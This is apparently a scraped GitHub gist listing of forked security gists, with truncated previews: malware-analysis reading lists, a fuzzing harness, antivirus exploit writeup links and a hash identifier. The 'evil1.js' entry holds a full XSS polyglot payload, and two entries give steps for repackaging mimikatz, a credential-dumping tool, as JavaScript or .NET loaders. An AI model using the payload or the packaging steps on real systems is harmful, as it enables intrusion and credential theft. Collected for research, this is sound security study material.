- Monappa K.A., "Learning Malware Analysis: Explore the concepts, tools, and techniques to analyze and investigate Windows malware".
- Sikorski M., Honig A., "Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software".
- Ferrie P., "The "Ultimate" Anti-Debugging Reference".
- Hale L.M., Adair S., Hartstein B., Richard M., "Malware Analyst’s Cookbook".
- Koret J., Bachaalany E., The Antivirus Hacker's Handbook.
- [Hanel A., "The Beginner's Guide to IDAPython"](https://leanpub.
trietptm
/ debugger_winappdbg.py
Created
September 10, 2020 17:46
— forked from v14dislav/debugger_winappdbg.py
pydbg -> winappdbg
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from winappdbg import * | |
| import sys | |
| import random | |
| import struct | |
| import subprocess | |
| size = 1000 | |
| exe_name = "fuzz_server.exe" | |
| snapshot_hook = 0x1400070C0 | |
| restore_hook = 0x140007537 |
trietptm
/ resources.md
Created
September 10, 2020 17:43
— forked from av-gantimurov/resources.md
List of resources for malware analysts
Create README.rst with https://gist.github.com/fdiskyou/b61de36f7656ab2eed59f6119fc6a372
Edit setup.py
long_desc=open('README.rst').read()
setup(
(...)
long_description=long_desc,
(...)
trietptm
/ reverse-shell.md
Created
September 2, 2020 14:05
— forked from gustavohenrique/reverse-shell.md
Reverse shell Cheat Sheet
trietptm
/ haxe_fast_constant16_integer_divide.hx
Created
September 1, 2020 07:08
— forked from soywiz/haxe_fast_constant16_integer_divide.hx
HAXE: Divide an integer expression by an integer constant (it converts the division into a multiplication and a shift)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class MathEx { | |
| /** | |
| * Divide the first integer expression by the second constant integer value. | |
| * It will just work with numerator being and unsigned short value (0x0000-0xFFFF) | |
| * | |
| * @param numerator Unsigned short numerator value | |
| * @param denominator Constant denominator value | |
| * @return | |
| */ | |
| @:macro static public function fastUintConstDiv16(numerator:Expr, denominator:Int):Expr { |
trietptm
/ evil1.js
Created
August 23, 2020 08:15
— forked from gattacker/evil1.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e |
trietptm
/ AV2019.txt
Created
August 23, 2020 08:15
— forked from v-p-b/AV2019.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://seclists.org/fulldisclosure/2019/Aug/1 | |
| https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67 | |
| https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/ | |
| https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM | |
| https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM | |
| https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM | |
| http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html | |
| https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968 | |
| https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6 | |
| https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html |
trietptm
/ Instructions-to-mimikatz-js.txt
Created
August 23, 2020 08:14
— forked from pljoel/Instructions-to-mimikatz-js.txt
mimikatz 2.1.1 in javascript
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| It is basically a wrap of the following projects: | |
| - mimikatz (https://github.com/gentilkiwi/mimikatz) | |
| - mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7) | |
| Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863) | |
| - DotNetToJScript (https://github.com/tyranid/DotNetToJScript) | |
| INSTRUCTIONS: | |
| 1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases | |
| 2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (You may want to comment the Exec() line though) | |
| b) It is going to produce a file.b64, so copy it's content and replace Delivery.Package.file string by it |
trietptm
/ Steps.txt
Created
August 23, 2020 08:14
— forked from med0x2e/Steps.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases | |
| 2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a | |
| 3. use @pljoel katz.cs cs file and uncomment the building lines available on Delivery.Program.Main() & comment Exec() line of code. | |
| 4. Build it to generate file.b64, copy its content and replace Package.file string available on payload.txt file. | |
| 6. Make sure payloadPath var is properly set on "TestAssemblyLoader.cs" | |
trietptm
/ HashIdentifier.py
Created
August 23, 2020 04:57
— forked from bl4de/HashIdentifier.py
Hash identifier by BalalaikaCr3w Psycho_Coder
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # encoding: utf-8 | |
| # Author: Psycho_Coder <https://psychocoder.github.io/> | |
| from re import match | |
| from sys import stdout, hexversion, exit, argv | |
| import traceback | |
| TITLE = """ | |
| _ _ _ _____ _ _ _ __ _ |